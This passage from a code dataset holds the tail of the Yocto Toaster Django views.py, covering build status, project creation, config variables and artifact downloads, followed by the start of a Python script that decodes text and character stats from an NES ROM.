target.task:\n build_stat['target'] = '%s:%s' % (target.target,target.task)\n else:\n build_stat['target'] = '%s' % (target.target)\n else:\n build_stat['target'] = ''\n # look up project name\n project = Project.objects.get( build = build )\n if project:\n build_stat['project'] = project.name\n else:\n build_stat['project'] = ''\n if Build.IN_PROGRESS == build.outcome:\n now = timezone.now()\n timediff = now - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['clone']='%d:%d' % (build.repos_cloned,build.repos_to_clone)\n build_stat['parse']='%d:%d' % (build.recipes_parsed,build.recipes_to_parse)\n tf = Task.objects.filter(build = build)\n tfc = tf.count()\n if tfc > 0:\n tfd = tf.exclude(order__isnull=True).count()\n else:\n tfd = 0\n build_stat['task']='%d:%d' % (tfd,tfc)\n else:\n build_stat['outcome'] = build.get_outcome_text()\n timediff = build.completed_on - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['stop'] = build.completed_on\n messages = LogMessage.objects.all().filter(build = build)\n errors = len(messages.filter(level=LogMessage.ERROR) |\n messages.filter(level=LogMessage.EXCEPTION) |\n messages.filter(level=LogMessage.CRITICAL))\n build_stat['errors'] = errors\n warnings = len(messages.filter(level=LogMessage.WARNING))\n build_stat['warnings'] = warnings\n if extend:\n build_stat['cooker_log'] = build.cooker_log_path\n except Exception as e:\n build_state = str(e)\n return build_stat\n\ndef json_builds(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.exclude(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'builds' : build_table, 'count' : len(builds)})\n\ndef json_building(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.filter(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'building' : build_table, 'count' : len(builds)})\n\ndef json_build(request,build_id):\n return JsonResponse({'build' : _json_build_status(build_id,True)})\n\n\nimport toastermain.settings\n\nfrom orm.models import Project, ProjectLayer, ProjectVariable\nfrom bldcontrol.models import BuildEnvironment\n\n# we have a set of functions if we're in managed mode, or\n# a default \"page not available\" simple functions for interactive mode\n\nif True:\n from django.contrib.auth.models import User\n from django.contrib.auth import authenticate, login\n\n from orm.models import LayerSource, ToasterSetting, Release\n\n import traceback\n\n class BadParameterException(Exception):\n ''' The exception raised on invalid POST requests '''\n pass\n\n # new project\n def newproject(request):\n if not project_enable:\n return redirect( landing )\n\n template = \"newproject.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n }\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"import\":\n mandatory_fields.append('importdir')\n else:\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"import\":\n if not os.path.isdir('%s/conf' % request.POST['importdir']):\n raise BadParameterException(\"Bad path or missing 'conf' directory (%s)\" % request.POST['importdir'])\n from django.core import management\n management.call_command('buildimport', '--command=import', '--name=%s' % request.POST['projectname'], '--path=%s' % request.POST['importdir'])\n prj = Project.objects.get(name = request.POST['projectname'])\n prj.merged_attr = True\n prj.save()\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release)\n prj.user_id = request.user.pk\n if 'mergeattr' == request.POST.get('mergeattr', ''):\n prj.merged_attr = True\n prj.save()\n\n return redirect(reverse(project, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # new project\n def newproject_specific(request, pid):\n if not project_enable:\n return redirect( landing )\n\n project = Project.objects.get(pk=pid)\n template = \"newproject_specific.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n 'projectname': project.name,\n 'project_pk': project.pk,\n }\n\n # WORKAROUND: if we already know release, redirect 'newproject_specific' to 'project_specific'\n if '1' == project.get_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE'):\n return redirect(reverse(project_specific, args=(project.pk,)))\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"build\":\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"analysis\":\n release = None\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release, existing_project = project)\n prj.user_id = request.user.pk\n prj.save()\n return redirect(reverse(project_specific, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # Shows the edit project page\n def project(request, pid):\n project = Project.objects.get(pk=pid)\n\n if '1' == os.environ.get('TOASTER_PROJECTSPECIFIC'):\n if request.GET:\n #Example:request.GET=\n params = urlencode(request.GET).replace('%5B%27','').replace('%27%5D','')\n return redirect(\"%s?%s\" % (reverse(project_specific, args=(project.pk,)),params))\n else:\n return redirect(reverse(project_specific, args=(project.pk,)))\n context = {\"project\": project}\n return toaster_render(request, \"project.html\", context)\n\n # Shows the edit project-specific page\n def project_specific(request, pid):\n project = Project.objects.get(pk=pid)\n\n # Are we refreshing from a successful project specific update clone?\n if Project.PROJECT_SPECIFIC_CLONING_SUCCESS == project.get_variable(Project.PROJECT_SPECIFIC_STATUS):\n return redirect(reverse(landing_specific,args=(project.pk,)))\n\n context = {\n \"project\": project,\n \"is_new\" : project.get_variable(Project.PROJECT_SPECIFIC_ISNEW),\n \"default_image_recipe\" : project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE),\n \"mru\" : Build.objects.all().filter(project=project,outcome=Build.IN_PROGRESS),\n }\n if project.build_set.filter(outcome=Build.IN_PROGRESS).count() > 0:\n context['build_in_progress_none_completed'] = True\n else:\n context['build_in_progress_none_completed'] = False\n return toaster_render(request, \"project.html\", context)\n\n # perform the final actions for the project specific page\n def project_specific_finalize(cmnd, pid):\n project = Project.objects.get(pk=pid)\n callback = project.get_variable(Project.PROJECT_SPECIFIC_CALLBACK)\n if \"update\" == cmnd:\n # Delete all '_PROJECT_PREPARE_' builds\n for b in Build.objects.all().filter(project=project):\n delete_build = False\n for t in b.target_set.all():\n if '_PROJECT_PREPARE_' == t.target:\n delete_build = True\n if delete_build:\n from django.core import management\n management.call_command('builddelete', str(b.id), interactive=False)\n # perform callback at this last moment if defined, in case Toaster gets shutdown next\n default_target = project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)\n if callback:\n callback = callback.replace(\"\",default_target)\n if \"cancel\" == cmnd:\n if callback:\n callback = callback.replace(\"\",\"none\")\n callback = callback.replace(\"--update\",\"--cancel\")\n # perform callback at this last moment if defined, in case this Toaster gets shutdown next\n ret = ''\n if callback:\n ret = os.system('bash -c \"%s\"' % callback)\n project.set_variable(Project.PROJECT_SPECIFIC_CALLBACK,'')\n # Delete the temp project specific variables\n project.set_variable(Project.PROJECT_SPECIFIC_ISNEW,'')\n project.set_variable(Project.PROJECT_SPECIFIC_STATUS,Project.PROJECT_SPECIFIC_NONE)\n # WORKAROUND: Release this workaround flag\n project.set_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE','')\n\n # Shows the final landing page for project specific update\n def landing_specific(request, pid):\n project_specific_finalize(\"update\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n # Shows the related landing-specific page\n def landing_specific_cancel(request, pid):\n project_specific_finalize(\"cancel\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n \"status\": \"cancel\",\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n def jsunittests(request):\n \"\"\" Provides a page for the js unit tests \"\"\"\n bbv = BitbakeVersion.objects.filter(branch=\"master\").first()\n release = Release.objects.filter(bitbake_version=bbv).first()\n\n name = \"_js_unit_test_prj_\"\n\n # If there is an existing project by this name delete it.\n # We don't want Lots of duplicates cluttering up the projects.\n Project.objects.filter(name=name).delete()\n\n new_project = Project.objects.create_project(name=name,\n release=release)\n # Add a layer\n layer = new_project.get_all_compatible_layer_versions().first()\n\n ProjectLayer.objects.get_or_create(layercommit=layer,\n project=new_project)\n\n # make sure we have a machine set for this project\n ProjectVariable.objects.get_or_create(project=new_project,\n name=\"MACHINE\",\n value=\"qemux86\")\n context = {'project': new_project}\n return toaster_render(request, \"js-unit-tests.html\", context)\n\n from django.views.decorators.csrf import csrf_exempt\n @csrf_exempt\n @log_view_mixin\n def xhr_testreleasechange(request, pid):\n def response(data):\n return HttpResponse(jsonfilter(data),\n content_type=\"application/json\")\n\n \"\"\" returns layer versions that would be deleted on the new\n release__pk \"\"\"\n try:\n prj = Project.objects.get(pk = pid)\n new_release_id = request.GET['new_release_id']\n\n # If we're already on this project do nothing\n if prj.release.pk == int(new_release_id):\n return reponse({\"error\": \"ok\", \"rows\": []})\n\n retval = []\n\n for project in prj.projectlayer_set.all():\n release = Release.objects.get(pk = new_release_id)\n\n layer_versions = prj.get_all_compatible_layer_versions()\n layer_versions = layer_versions.filter(release = release)\n layer_versions = layer_versions.filter(layer__name = project.layercommit.layer.name)\n\n # there is no layer_version with the new release id,\n # and the same name\n if layer_versions.count() < 1:\n retval.append(project)\n\n return response({\"error\":\"ok\",\n \"rows\": [_lv_to_dict(prj) for y in [x.layercommit for x in retval]]\n })\n\n except Exception as e:\n return response({\"error\": str(e) })\n\n @log_view_mixin\n def xhr_configvaredit(request, pid):\n try:\n prj = Project.objects.get(id = pid)\n # There are cases where user can add variables which hold values\n # like http://, file:/// etc. In such case a simple split(\":\")\n # would fail. One example is SSTATE_MIRRORS variable. So we use\n # max_split var to handle them.\n max_split = 1\n # add conf variables\n if 'configvarAdd' in request.POST:\n t=request.POST['configvarAdd'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable, value = value)\n # change conf variables\n if 'configvarChange' in request.POST:\n t=request.POST['configvarChange'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable)\n pt.value=value\n pt.save()\n # remove conf variables\n if 'configvarDel' in request.POST:\n t=request.POST['configvarDel'].strip()\n pt = ProjectVariable.objects.get(pk = int(t)).delete()\n\n # return all project settings, filter out disallowed and elsewhere-managed variables\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars_query = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars_query = configvars_query.exclude(name = var)\n for var in vars_disallowed:\n configvars_query = configvars_query.exclude(name = var)\n\n return_data = {\n \"error\": \"ok\",\n 'configvars': [(x.name, x.value, x.pk) for x in configvars_query]\n }\n try:\n return_data['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n\n return HttpResponse(json.dumps( return_data ), content_type = \"application/json\")\n\n except Exception as e:\n return HttpResponse(json.dumps({\"error\":str(e) + \"\\n\" + traceback.format_exc()}), content_type = \"application/json\")\n\n\n @log_view_mixin\n def customrecipe_download(request, pid, recipe_id):\n recipe = get_object_or_404(CustomImageRecipe, pk=recipe_id)\n\n file_data = recipe.generate_recipe_file_contents()\n\n response = HttpResponse(file_data, content_type='text/plain')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"%s_%s.bb\"' % (recipe.name,\n recipe.version)\n\n return response\n\n def importlayer(request, pid):\n template = \"importlayer.html\"\n context = {\n 'project': Project.objects.get(id=pid),\n }\n return toaster_render(request, template, context)\n\n def layerdetails(request, pid, layerid):\n project = Project.objects.get(pk=pid)\n layer_version = Layer_Version.objects.get(pk=layerid)\n\n project_layers = ProjectLayer.objects.filter(\n project=project).values_list(\"layercommit_id\",\n flat=True)\n\n context = {\n 'project': project,\n 'layer_source': LayerSource.types_dict(),\n 'layerversion': layer_version,\n 'layerdeps': {\n \"list\": [\n {\n \"id\": dep.id,\n \"name\": dep.layer.name,\n \"layerdetailurl\": reverse('layerdetails',\n args=(pid, dep.pk)),\n \"vcs_url\": dep.layer.vcs_url,\n \"vcs_reference\": dep.get_vcs_reference()\n }\n for dep in layer_version.get_alldeps(project.id)]\n },\n 'projectlayers': list(project_layers)\n }\n\n return toaster_render(request, 'layerdetails.html', context)\n\n\n def get_project_configvars_context():\n # Vars managed outside of this view\n vars_managed = {\n 'MACHINE', 'BBLAYERS'\n }\n\n vars_disallowed = {\n 'PARALLEL_MAKE','BB_NUMBER_THREADS',\n 'BB_DISKMON_DIRS','BB_NUMBER_THREADS','CVS_PROXY_HOST','CVS_PROXY_PORT',\n 'PARALLEL_MAKE','TMPDIR',\n 'all_proxy','ftp_proxy','http_proxy ','https_proxy'\n }\n\n vars_fstypes = Target_Image_File.SUFFIXES\n\n return(vars_managed,sorted(vars_fstypes),vars_disallowed)\n\n def projectconf(request, pid):\n\n try:\n prj = Project.objects.get(id = pid)\n except Project.DoesNotExist:\n return HttpResponseNotFound(\"
Project id \" + pid + \" is unavailable
\")\n\n # remove disallowed and externally managed varaibles from this list\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars = configvars.exclude(name = var)\n for var in vars_disallowed:\n configvars = configvars.exclude(name = var)\n\n context = {\n 'project': prj,\n 'configvars': configvars,\n 'vars_managed': vars_managed,\n 'vars_fstypes': vars_fstypes,\n 'vars_disallowed': vars_disallowed,\n }\n\n try:\n context['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value\n context['distro_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value == \"${TOPDIR}/../downloads\":\n be = BuildEnvironment.objects.get(pk = str(1))\n dl_dir = os.path.join(dirname(be.builddir), \"downloads\")\n context['dl_dir'] = dl_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"DL_DIR\")\n pv.value = dl_dir\n pv.save()\n else:\n context['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value\n context['dl_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n try:\n context['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value\n context['fstypes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value\n context['image_install_append_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value\n context['package_classes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value == \"${TOPDIR}/../sstate-cache\":\n be = BuildEnvironment.objects.get(pk = str(1))\n sstate_dir = os.path.join(dirname(be.builddir), \"sstate-cache\")\n context['sstate_dir'] = sstate_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"SSTATE_DIR\")\n pv.value = sstate_dir\n pv.save()\n else:\n context['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value\n context['sstate_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n\n return toaster_render(request, \"projectconf.html\", context)\n\n def _file_names_for_artifact(build, artifact_type, artifact_id):\n \"\"\"\n Return a tuple (file path, file name for the download response) for an\n artifact of type artifact_type with ID artifact_id for build; if\n artifact type is not supported, returns (None, None)\n \"\"\"\n file_name = None\n response_file_name = None\n\n if artifact_type == \"cookerlog\":\n file_name = build.cooker_log_path\n response_file_name = \"cooker.log\"\n\n elif artifact_type == \"imagefile\":\n file_name = Target_Image_File.objects.get(target__build = build, pk = artifact_id).file_name\n\n elif artifact_type == \"targetkernelartifact\":\n target = TargetKernelFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"targetsdkartifact\":\n target = TargetSDKFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"licensemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).license_manifest_path\n\n elif artifact_type == \"packagemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).package_manifest_path\n\n elif artifact_type == \"tasklogfile\":\n file_name = Task.objects.get(build = build, pk = artifact_id).logfile\n\n elif artifact_type == \"logmessagefile\":\n file_name = LogMessage.objects.get(build = build, pk = artifact_id).pathname\n\n if file_name and not response_file_name:\n response_file_name = os.path.basename(file_name)\n\n return (file_name, response_file_name)\n\n def build_artifact(request, build_id, artifact_type, artifact_id):\n \"\"\"\n View which returns a build artifact file as a response\n \"\"\"\n file_name = None\n response_file_name = None\n\n try:\n build = Build.objects.get(pk = build_id)\n file_name, response_file_name = _file_names_for_artifact(\n build, artifact_type, artifact_id\n )\n\n if file_name and response_file_name:\n fsock = open(file_name, \"rb\")\n content_type = MimeTypeFinder.get_mimetype(file_name)\n\n response = HttpResponse(fsock, content_type = content_type)\n\n disposition = \"attachment; filename=\" + response_file_name\n response[\"Content-Disposition\"] = disposition\n\n return response\n else:\n return toaster_render(request, \"unavailable_artifact.html\")\n except (ObjectDoesNotExist, IOError):\n return toaster_render(request, \"unavailable_artifact.html\")\n\n","repo_name":"openbmc/openbmc","sub_path":"poky/bitbake/lib/toaster/toastergui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":83444,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"16"}
+{"seq_id":"17821989844","text":"#!/usr/bin/env python3\n\n\"\"\"Dump data in an iNES ROM file.\n\nUsage:\n poetry install\n poetry run ./jvqdump.py input_ines_file_path output_excel_file_path\n\"\"\"\n\nimport argparse\nimport binascii\nimport collections\nimport dataclasses\nimport enum\nimport itertools\nimport operator\nimport struct\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\nimport openpyxl\nimport openpyxl.styles\n\n_ENEMY_GROUP_PATTERN_LIST_ID_COUNT = 155\n_MAP_ID_COUNT = 350\n_MAX_ACTIONS_PER_ENEMY = 8\n_ENEMY_ID_COUNT = 173\n\n\ndef _read_prg_rom(input_ines_file_path: str) -> bytes:\n ines_header_byte_size = 16\n with open(input_ines_file_path, \"rb\") as f:\n header_bytes = f.read(ines_header_byte_size)\n if len(header_bytes) != ines_header_byte_size:\n raise ValueError(\"Invalid iNES header\")\n if header_bytes[0:4] != b\"NES\\x1a\":\n raise ValueError(\"Invalid signature\")\n prg_rom_byte_size = header_bytes[4] * 0x4000\n prg_rom_bytes = f.read(prg_rom_byte_size)\n if len(prg_rom_bytes) != prg_rom_byte_size:\n raise ValueError(\"Insufficient PRG ROM\")\n return prg_rom_bytes\n\n\ndef _decode_string(str_bytes: bytes) -> str:\n byte_to_str = {\n # 0x00: ??\n 0x01: \"あ\",\n 0x02: \"い\",\n 0x03: \"う\",\n 0x04: \"え\",\n 0x05: \"お\",\n 0x06: \"か\",\n 0x07: \"き\",\n 0x08: \"く\",\n 0x09: \"け\",\n 0x0A: \"こ\",\n 0x0B: \"さ\",\n 0x0C: \"し\",\n 0x0D: \"す\",\n 0x0E: \"せ\",\n 0x0F: \"そ\",\n # 0x10: 半濁点\n 0x11: \"た\",\n 0x12: \"ち\",\n 0x13: \"つ\",\n 0x14: \"て\",\n 0x15: \"と\",\n 0x16: \"な\",\n 0x17: \"に\",\n 0x18: \"ぬ\",\n 0x19: \"ね\",\n 0x1A: \"の\",\n 0x1B: \"は\",\n 0x1C: \"ひ\",\n 0x1D: \"ふ\",\n 0x1E: \"へ\",\n 0x1F: \"ほ\",\n 0x20: \"両\",\n 0x21: \"ま\",\n 0x22: \"み\",\n 0x23: \"む\",\n 0x24: \"め\",\n 0x25: \"も\",\n 0x26: \"や\",\n 0x27: \"ゆ\",\n 0x28: \"よ\",\n 0x29: \"ら\",\n 0x2A: \"り\",\n 0x2B: \"る\",\n 0x2C: \"れ\",\n 0x2D: \"ろ\",\n 0x2E: \"わ\",\n 0x2F: \"を\",\n 0x30: \"0\",\n 0x31: \"1\",\n 0x32: \"2\",\n 0x33: \"3\",\n 0x34: \"4\",\n 0x35: \"5\",\n 0x36: \"6\",\n 0x37: \"7\",\n 0x38: \"8\",\n 0x39: \"9\",\n 0x3A: \"!\",\n 0x3B: \"?\",\n 0x3C: \"「\",\n 0x3D: \"/\",\n 0x3E: \"・\",\n 0x3F: \"ん\",\n 0x40: \"■\",\n 0x41: \"ア\",\n 0x42: \"イ\",\n 0x43: \"ウ\",\n 0x44: \"エ\",\n 0x45: \"オ\",\n 0x46: \"カ\",\n 0x47: \"キ\",\n 0x48: \"ク\",\n 0x49: \"ケ\",\n 0x4A: \"コ\",\n 0x4B: \"サ\",\n 0x4C: \"シ\",\n 0x4D: \"ス\",\n 0x4E: \"セ\",\n 0x4F: \"ソ\",\n # 0x50: ??\n 0x51: \"タ\",\n 0x52: \"チ\",\n 0x53: \"ツ\",\n 0x54: \"テ\",\n 0x55: \"ト\",\n 0x56: \"ナ\",\n 0x57: \"ニ\",\n 0x58: \"ヌ\",\n 0x59: \"ネ\",\n 0x5A: \"ノ\",\n 0x5B: \"ハ\",\n 0x5C: \"ヒ\",\n 0x5D: \"フ\",\n 0x5E: \"ー\",\n 0x5F: \"ホ\",\n # 0x60: ??\n 0x61: \"マ\",\n 0x62: \"ミ\",\n 0x63: \"ム\",\n 0x64: \"メ\",\n 0x65: \"モ\",\n 0x66: \"ヤ\",\n 0x67: \"ユ\",\n 0x68: \"ヨ\",\n 0x69: \"ラ\",\n 0x6A: \"◆\",\n 0x6B: \"ル\",\n 0x6C: \"レ\",\n 0x6D: \"ロ\",\n 0x6E: \"ワ\",\n 0x6F: \"超\",\n # 0x70: Frame\n # 0x71: Frame\n # 0x72: Frame\n # 0x73: Frame\n # 0x74: Frame\n # 0x75: Frame\n # 0x76: Frame\n # 0x77: Frame\n 0x78: \"ッ\",\n 0x79: \"ャ\",\n 0x7A: \"ュ\",\n 0x7B: \"ョ\",\n 0x7C: \"ァ\",\n 0x7D: \"っ\",\n 0x7E: \"ゃ\",\n 0x7F: \"ン\",\n 0x80: \"ゅ\",\n 0x81: \"ょ\",\n # 0x82: ??\n 0x83: \"ェ\",\n # 0x84: ??\n # 0x85: ??\n 0x86: \"が\",\n 0x87: \"ぎ\",\n 0x88: \"ぐ\",\n 0x89: \"げ\",\n 0x8A: \"ご\",\n 0x8B: \"ざ\",\n 0x8C: \"じ\",\n 0x8D: \"ず\",\n 0x8E: \"ぜ\",\n 0x8F: \"ぞ\",\n # 0x90: Invalid\n 0x91: \"だ\",\n 0x92: \"ぢ\",\n 0x93: \"づ\",\n 0x94: \"で\",\n 0x95: \"ど\",\n # 0x96: Invalid\n # 0x97: Invalid\n # 0x98: Invalid\n # 0x99: Invalid\n # 0x9A: Invalid\n 0x9B: \"ば\",\n 0x9C: \"び\",\n 0x9D: \"ぶ\",\n 0x9E: \"べ\",\n 0x9F: \"ぼ\",\n # 0xA0: Invalid\n 0xA1: \"ぱ\",\n 0xA2: \"ぴ\",\n 0xA3: \"ぶ\",\n 0xA4: \"ぺ\",\n 0xA5: \"ぽ\",\n 0xA6: \"パ\",\n 0xA7: \"ピ\",\n 0xA8: \"プ\",\n # 0xA9: Invalid\n 0xAA: \"ポ\",\n # 0xAB: Invalid\n # 0xAC: Invalid\n # 0xAD: Invalid\n # 0xAE: Invalid\n # 0xAF: Invalid\n # 0xB0: Invalid\n # 0xB1: Invalid\n # 0xB2: Invalid\n # 0xB3: Invalid\n # 0xB4: Invalid\n # 0xB5: Invalid\n # 0xB6: Invalid\n # 0xB7: Invalid\n # 0xB8: Invalid\n # 0xB9: Invalid\n # 0xBA: Invalid\n # 0xBB: Invalid\n # 0xBC: Invalid\n # 0xBD: Invalid\n # 0xBE: Invalid\n # 0xBF: Invalid\n # 0xC0: Invalid\n # 0xC1: Invalid\n # 0xC2: Invalid\n # 0xC3: Invalid\n # 0xC4: Invalid\n # 0xC5: Invalid\n 0xC6: \"ガ\",\n 0xC7: \"ギ\",\n 0xC8: \"グ\",\n 0xC9: \"ゲ\",\n 0xCA: \"ゴ\",\n 0xCB: \"ザ\",\n 0xCC: \"ジ\",\n 0xCD: \"ズ\",\n 0xCE: \"ゼ\",\n 0xCF: \"ゾ\",\n # 0xD0: Invalid\n 0xD1: \"ダ\",\n 0xD2: \"ヂ\",\n 0xD3: \"ヅ\",\n 0xD4: \"デ\",\n 0xD5: \"ド\",\n # 0xD6: Invalid\n # 0xD7: Invalid\n # 0xD8: Invalid\n # 0xD9: Invalid\n # 0xDA: Invalid\n 0xDB: \"バ\",\n 0xDC: \"ビ\",\n 0xDD: \"ブ\",\n # 0xDE: Invalid\n 0xDF: \"ボ\",\n # 0xE0: Invalid\n # 0xE1: Invalid\n # 0xE2: Invalid\n # 0xE3: Invalid\n # 0xE4: Invalid\n # 0xE5: Invalid\n # 0xE6: Invalid\n # 0xE7: Invalid\n # 0xE8: Invalid\n # 0xE9: Invalid\n # 0xEA: Invalid\n # 0xEB: Invalid\n # 0xEC: Invalid\n # 0xED: Invalid\n # 0xEE: Invalid\n # 0xEF: Invalid\n # 0xF0: Invalid\n # 0xF1: Invalid\n # 0xF2: Invalid\n # 0xF3: Invalid\n # 0xF4: Invalid\n # 0xF5: Invalid\n # 0xF6: Invalid\n # 0xF7: Invalid\n # 0xF8: Invalid\n # 0xF9: Invalid\n # 0xFA: Invalid\n # 0xFB: Invalid\n # 0xFC: Invalid\n # 0xFD: Invalid\n # 0xFE: Invalid\n 0xFF: \" \", # Space\n }\n return \"\".join(byte_to_str[s] for s in str_bytes)\n\n\n@enum.unique\nclass _PlayerCharacterType(enum.Enum):\n JUVEI = \"じゅうべえ\"\n RYUHIME = \"りゅうひめ\"\n WOLF = \"ウルフ・シロ\"\n IWAN = \"イワン・ガンちゃん\"\n ONITAN = \"オニタン\"\n HINOTORI = \"ひのとり\"\n SARUBOSS = \"サルボス\"\n PENTA = \"ペンタ\"\n LUCKY = \"ラッキー\"\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacterLevel:\n level: int\n hp: int # 命\n cp: int # 超力\n attack: int # 攻撃\n defense: int # 守備\n speed: int # スピード\n ten: int # 天の守り\n shin: int # 芯の強さ\n atama: int # 頭の良さ\n experience_required_from_previous_level: int\n 